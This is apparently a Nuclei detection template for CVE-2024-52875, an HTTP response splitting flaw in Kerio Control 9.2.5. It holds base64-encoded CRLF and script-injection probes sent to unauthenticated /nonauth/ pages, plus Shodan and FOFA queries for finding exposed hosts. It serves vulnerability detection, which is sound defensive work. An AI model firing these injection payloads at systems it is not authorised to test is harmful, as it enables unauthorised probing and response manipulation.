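# Detection template for CVE-2024-52875 (HTTP response splitting in Kerio Control).
# Each request sends a base64 `dest` value to a page under /nonauth/ and checks
# whether the decoded bytes come back unescaped in the response head or body.
id: CVE-2024-52875

info:
  name: Kerio Control v9.2.5 - CRLF Injection
  author: ritikchaddha,iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Kerio Control, formerly known as Kerio WinRoute Firewall, has been found vulnerable to multiple HTTP Response Splitting vulnerabilities in product affecting versions 9.2.5
  reference:
    - https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875
    - https://nvd.nist.gov/vuln/detail/CVE-2024-52875
  classification:
    cve-id: CVE-2024-52875
    cwe-id: CWE-74
  metadata:
    verified: true
    max-request: 4
    shodan-query: "Kerio Control"
    fofa-query: "Kerio Control"
  tags: cve,cve2024,kerio,crlf

http:
  - method: GET
    path:
      # Paths 1-3 carry the same probe: base64 of "Test", CR LF, "CRLF:".
      - "{{BaseURL}}/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d"
      - "{{BaseURL}}/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d"
      - "{{BaseURL}}/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d"
      # Path 4 carries two LFs followed by a script marker, so a vulnerable
      # host ends the header block early and returns the marker as body.
      - "{{BaseURL}}/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d"

    # Stop after the first hit so a confirmed host is not probed further.
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      # Paths 1-3: the probe surfaced as a response header of its own with an
      # empty value. The name is matched as "Crlf", presumably because header
      # names are canonicalised before matching - confirm.
      - type: regex
        part: header
        regex:
          - '(?m)^Crlf:\s*$'

      # Path 4: the marker decoded from that request must appear in the body
      # of an HTML 302. An empty needle here is true for every response and
      # would flag any text/html redirect, including patched hosts.
      - type: dsl
        dsl:
          - "contains(body,'<script>alert(document.domain)</script>')"
          - 'contains(content_type, "text/html")'
          # NOTE(review): an empty needle matches any Location value, so this
          # line adds no constraint. Left unchanged because the intended value
          # is not recoverable from this page - confirm against upstream.
          - 'contains(location, "")'
          - 'status_code == 302'
        condition: and

# NOTE(review): the digest below signs the template text as it was originally
# published. Re-sign after any edit, or verification is expected to fail.
# digest: 4b0a00483046022100ba3e1692f48308aee5c4a43e2c3bfd61ebdfeab81570d1c00a1b4a40e3be1c6e022100dfe5ac9d2d69e28a65561370fcab770a365f3c86fd227aee2232d5cd8b689994:922c64590222798bb761d5b6d8e72950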